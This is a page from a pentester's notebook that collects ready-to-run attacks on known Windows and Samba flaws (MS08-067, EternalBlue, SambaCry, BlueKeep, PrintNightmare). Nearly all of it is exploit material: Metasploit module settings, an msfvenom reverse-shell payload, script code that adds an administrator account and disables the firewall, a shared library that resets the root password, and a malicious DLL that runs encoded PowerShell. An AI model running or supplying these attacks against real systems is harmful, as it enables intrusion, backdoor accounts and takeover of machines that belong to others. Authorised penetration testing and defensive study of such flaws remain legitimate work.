Pentester's Promiscuous Notebook
Blog
GitHub
Twitter
Search…
README
⚒️ Pentest
C2
Infrastructure
AD
DevOps
DBMS
Authentication Brute Force
File Transfer
IPMI
Kiosk Breakout
Low-Hanging Fruits
LPE
Networks
NFS
Persistence
Pivoting
Post Exploitation
SNMP
TFTP
VNC
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By
GitBook
Low-Hanging Fruits
net_api
CVE-2008-4250, MS08-067
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalBlue
CVE-2017-0144, MS17-010
MSF
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
EternalRomance / EternalSynergy / EternalChampion
Exploit with
ms17_010_psexec
:
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with
ms17_010_command
:
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user snovvcrash Passw0rd! /add && net localgroup administrators snovvcrash /add"
msf > run
Manually
https://github.com/helviojunior/MS17-010
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010
Send MSF payload and execute it with
send_and_execute.py
:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via
zzz_exploit.py
(at least one named pipe must be accessible on target):
$ python zzz_exploit.py
zzz_exploit.py
...
def
smb_pwn
(
conn
,
arch
):
service_exec
(
conn
,
r'cmd /c net user snovvcrash Passw0rd! /add'
)
service_exec
(
conn
,
r'cmd /c net localgroup administrators snovvcrash /add'
)
service_exec
(
conn
,
r'cmd /c netsh firewall set opmode disable'
)
...
For x86 EternalBlue shellcodes use
AutoBlue-MS17-010
.
FuzzBunch (Wine)
https://github.com/fuzzbunch/fuzzbunch
https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956
https://habr.com/ru/post/327490/
SambaCry
CVE-2017-7494
(Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)
MSF
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
Manually
https://github.com/opsxcq/exploit-CVE-2017-7494
https://github.com/joxeankoret/CVE-2017-7494
Compile
.so
SUID shared library:
pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c
#
include
<stdio.h>
#
include
<stdlib.h>
static
void
pwn
()
__attribute__
((
constructor
));
void
pwn
()
{
setresuid
(
0
,
0
,
0
);
system
(
"echo 'root:Passw0rd!'|chpasswd"
);
}
Get real share path on the target's filesystem:
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path: /home/snovvcrash/sharename
Upload
pwn.so
to target and then run the exploit:
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
BlueKeep
CVE-2019-0708
Check:
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
PrintNightmare
CVE-2021-16751, CVE-2021-34527
https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/
Check
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
ItWasAllADream
https://github.com/byt3bl33d3r/ItWasAllADream
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24
Exploit
C/C++
RCE (fork of the original repo):
https://github.com/afwu/PrintNightmare
LPE:
https://github.com/hlldz/CVE-2021-1675-LPE
Python
RCE:
https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py
https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py
https://www.hackthebox.eu/blog/windows-protocols-python
Usage
1.
Prepare
an SMB share with anonymous authentication
allowed (
smbserver.py
also works):
2.
Generate an evil DLL: a С2 stager / add user to a privileged group (
1
,
2
,
3
, etc.) / invoke a
custom
command (see example below).
3.
Run the exploit:
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
#
include
<windows.h>
#
include
<stdlib.h>
#
include
<stdio.h>
// Default function that is executed when the DLL is loaded
void
Entry
()
{
system
(
"powershell -enc <BASE64_PWSH_CODE>"
);
}
BOOL APIENTRY
DllMain
(
HMODULE hModule
,
DWORD ul_reason_for_call
,
LPVOID lpReserved
)
{
switch
(
ul_reason_for_call
)
{
case
DLL_PROCESS_ATTACH
:
CreateThread
(
0
,
0
,
(
LPTHREAD_START_ROUTINE
)
Entry
,
0
,
0
,
0
);
break
;
case
DLL_THREAD_ATTACH
:
case
DLL_THREAD_DETACH
:
case
DLL_PROCESS_DETACH
:
break
;
}
return
TRUE
;
}
Leveraging PrintNightmare to Abuse RBCD and DCSync the Domain
[email protected]
:~$ _
C#
RCE + LPE:
https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
PowerShell
LPE:
https://github.com/calebstewart/CVE-2021-1675
Reproducibility
Flowchart by
@wdormann
:
Mitigation
https://github.com/LaresLLC/CVE-2021-1675
Previous
Kiosk Breakout
Next
LPE
Last modified
8d ago
Copy link
Outline
net_api
EternalBlue
MSF
Manually
FuzzBunch (Wine)
SambaCry
MSF
Manually
BlueKeep
PrintNightmare
Check
Exploit
Reproducibility
Mitigation